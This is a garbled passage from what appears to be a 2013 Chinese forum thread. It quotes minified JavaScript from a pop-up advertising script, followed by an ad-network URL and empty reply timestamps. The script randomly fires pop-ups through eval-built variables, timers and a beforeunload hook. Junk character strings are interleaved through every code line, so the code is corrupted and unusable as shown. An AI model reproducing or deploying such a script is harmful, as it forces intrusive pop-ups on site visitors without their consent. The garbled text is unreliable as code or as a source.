1 B$ A# p. P, d) c- D - pop(url, {
( r) x: K$ X6 D Z4 X, w* f2 ` - a: 1, 9 ]" [+ e4 @1 h- k' m
- b: 2
- G; B- M4 w' n: `6 n4 r - })
]4 }( D) f9 ~9 b5 ?, N+ p - },
5 ]0 ~. E- ?9 O% t9 d0 n - 300) , Z+ f+ h2 `0 q" h* W; ]& H
- } 8 i% C1 p% x [' I$ ?4 C1 o
- for (var i = 1; i <= 10; i++) {
9 p7 t4 s3 V$ d$ K: p$ Z - var n = i == 1 ? "": i;
+ F: g: W, `6 \3 q1 K* |* M! I - if (eval("_pt" + n + "b") > Math.random()) {
+ P. \! p* l) Z - setTimeout(function() { 1 u) W# |' D1 S% f
- setTimeout(function() {
- U4 L( @8 W$ J0 T4 r+ A/ }: }* N% Q - pop(url, { " |, T4 \8 V" p4 Q7 x
- a: 1,
( @# L! L I/ v, s4 B7 H - b: 2
d8 F4 L4 U! f0 M2 s6 H - }) - g' [0 ?) i [" e7 t4 E, B( n! I: r
- }, ' o& S* l" A& G3 v! x& k
- 300)
+ H' b* Y! d) f8 h2 z+ v - },
. X$ v; n7 t4 _+ | - parseInt(eval("_pt" + n + "a")) * 1000) ( J; W7 [) J/ \) e2 A
- } ' v: i& C0 D4 T) d9 a: k3 `, @
- }
: D. O, M5 ^' {! K! L - if (_pc2 > Math.random()) { - r5 O" k( m, p: b/ e# l. u1 @- |0 C
- a_pop(url)
' `* `) O/ y' g: t6 B( { - } 4 ?" q+ J9 I6 I9 I, A3 d* E( G
- if (_po > Math.random()) { 7 X& j% s8 @ H( X3 b1 L; V& h
- try { 6 `6 p+ J! w6 F# U- g+ W
- func(url)
8 ?2 m/ N( Z9 Q1 b5 M$ Z1 @2 A - } catch(q) {} ; M! ?5 m8 y/ ~/ r5 i. j
- } 5 h) w7 C% h' g3 p& V% v
- } : n& t$ H2 K% K' y# e8 B/ V$ w r( ?
- };
- I7 b/ ^ s2 E - fstart(aa_url); ! k4 Y3 t3 C% O* V$ o( s1 u
- event(window, 'beforeunload', ; v* o4 c8 `" c: I5 D' ~& V3 o; r0 _
- function() {})
/ ~; g# \+ i6 B( o" W5 Y- T r - })();
URL从这里产生
7 J! l5 x( b/ o' b& R+ w0 ^! W, C* J8 @. `
http://play.unionsky.cn/show/?placeid=1418306 q- I; l. Q$ D) a$ I% t" m
! I3 m9 D; V. I2 L, C- i
) d6 y$ O" F1 T |
发表于 2013-12-17 15:03:03
楼主
D:1
发表于 2013-12-17 15:31:30
发表于 2013-12-17 16:34:22
发表于 2013-12-17 19:34:38
